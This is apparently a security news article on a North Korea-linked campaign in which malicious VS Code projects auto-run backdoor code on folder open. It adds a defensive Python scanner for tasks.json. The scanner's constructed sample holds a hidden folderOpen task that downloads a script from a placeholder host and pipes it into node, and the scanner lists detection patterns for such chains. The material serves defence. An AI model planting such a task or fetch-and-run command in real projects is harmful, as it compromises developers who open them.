North Korea-linked actors use malicious VS Code projects to deploy backdoor


A technical report by Jamf Threat Labs describes North Korea-linked threat actors using malicious Microsoft Visual Studio Code projects as lures to deliver a backdoor. The backdoor gives the attackers remote code execution as soon as a target opens a cloned repository in VS Code.

KEY FACTS

  • Incident: Malicious VS Code projects execute code when a project folder is opened
  • Technique: Abuse of VS Code tasks.json with runOn: folderOpen to fetch and run payloads
  • Payloads: Node.js and Python components named BeaverTail and InvisibleFerret
  • Targets: Software engineers, especially in crypto, blockchain, and fintech

The attack uses the project's VS Code task configuration (.vscode/tasks.json) with a task whose runOn option is set to folderOpen, so obfuscated JavaScript runs as soon as the cloned project is opened in the editor. The JavaScript contacts a remote server and executes additional code staged on a Vercel domain.

On macOS the chain starts a detached background shell command (nohup bash -c) that uses curl to pipe a JavaScript payload directly into the Node.js runtime. Because it is detached, the payload keeps running independently of the VS Code process and establishes a persistent execution loop that harvests basic host information and accepts remote commands.
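As an added example (not code from the report or from Jamf Threat Labs), the following Python scanner applies the two paragraphs above to a cloned repository before anyone opens it in VS Code: it parses .vscode/tasks.json (which is JSONC, so comments and trailing commas are tolerated), keeps only tasks whose runOn is folderOpen, and flags command lines that download with curl or wget, detach with nohup, or pipe fetched content into an interpreter. The embedded sample tasks.json is constructed for illustration and its hostname is a placeholder, not an indicator from the report.

```python
"""Flag VS Code tasks that auto-run on folder open and fetch-and-execute code.

Added example for this article, not Jamf Threat Labs tooling. The sample
tasks.json below is constructed; the hostname is a placeholder, not an IOC.
"""
import json
import re
from pathlib import Path


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas, but only outside
    strings: a naive regex would also eat the '//' in https:// URLs."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):       # drop to end of line, keep the newline
            j = text.find("\n", i)
            i = (n if j == -1 else j) - 1
        elif text.startswith("/*", i):       # drop the block comment
            j = text.find("*/", i + 2)
            i = (n if j == -1 else j + 2) - 1
        else:
            out.append(c)
        i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def _as_str(value) -> str:
    """command/args entries may be strings or {"value": ..., "quoting": ...}."""
    if isinstance(value, dict):
        return str(value.get("value", ""))
    return str(value) if value is not None else ""


def task_command_line(task: dict) -> str:
    """Flatten command + args, including the osx/linux/windows overrides."""
    parts = [_as_str(task.get("command"))] + [_as_str(a) for a in task.get("args", [])]
    for key in ("osx", "linux", "windows"):
        override = task.get(key) or {}
        parts.append(_as_str(override.get("command")))
        parts += [_as_str(a) for a in override.get("args", [])]
    return " ".join(p for p in parts if p)


# Heuristics for the fetch-and-run chains described in the report.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads from the network"),
    (re.compile(r"\bnohup\b|&\s*$"), "detaches from the editor process"),
    (re.compile(r"\|\s*(node|python3?|bash|sh)\b"), "pipes fetched content into an interpreter"),
    (re.compile(r"\bnode\s+-e\b|\bpython3?\s+-c\b|\bbase64\s+(-d|--decode)\b"), "runs inline or decoded code"),
]


def find_autorun_tasks(tasks_json: dict) -> list[dict]:
    """Return every task VS Code would start when the folder is opened."""
    findings = []
    for task in tasks_json.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command_line(task)
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmd,
                         "reasons": [why for rx, why in SUSPICIOUS if rx.search(cmd)]})
    return findings


def scan_text(text: str) -> list[dict]:
    return find_autorun_tasks(json.loads(strip_jsonc(text)))


def scan_repo(repo: Path) -> list[dict]:
    path = repo / ".vscode" / "tasks.json"
    return scan_text(path.read_text(encoding="utf-8")) if path.is_file() else []


# Constructed sample: a hidden folderOpen task that detaches, downloads a
# script and pipes it into node. The hostname is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  // Build settings for the take-home assessment
  "version": "2.0.0",
  "tasks": [
    {
      "label": "prepare-env",
      "type": "shell",
      "command": "nohup bash -c \"curl -fsSL https://staging.example.invalid/init.js | node\" >/dev/null 2>&1 &",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
    { "label": "test", "type": "shell", "command": "npm test", },
  ]
}'''

if __name__ == "__main__":
    for f in scan_text(SAMPLE_TASKS_JSON):
        print(f"[folderOpen] {f['label']}: {f['command']}")
        for why in f["reasons"]:
            print(f"    - {why}")
```

Run scan_repo on a freshly cloned directory before opening it in the editor. The heuristics are a triage aid only: they will not see through obfuscated commands or the malicious npm dependency the campaign also uses, and a folderOpen task with no suspicious keywords still deserves a look. The editor-side control is separate from this script: VS Code only runs folderOpen tasks in a trusted workspace, and setting "task.allowAutomaticTasks" to "off" in user settings disables them entirely, so keeping Workspace Trust enabled and declining to trust repositories from unknown authors removes the trigger this campaign depends on.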

The campaign delivers Node.js and Python components named BeaverTail and InvisibleFerret. Their functionality includes keystroke logging, screenshots, home directory scans for sensitive files, clipboard wallet address substitution, and an XMRig cryptocurrency miner, with AnyDesk used for remote access in some cases.

The lures instruct targets to clone repositories hosted on Git platforms and open the projects as part of a purported job assessment. Multiple fallback mechanisms are used, including a malicious npm dependency and multi-stage droppers, to increase the likelihood of successful compromise if the tasks.json trigger does not fire.

WHY IT MATTERS

The technique exploits a normal developer workflow, opening a cloned project in the editor, to run code automatically, so engineers who clone repositories from unknown authors are at risk without ever running a build or install step themselves. Successful execution gives the attackers persistent remote access and enables both data theft and financial theft.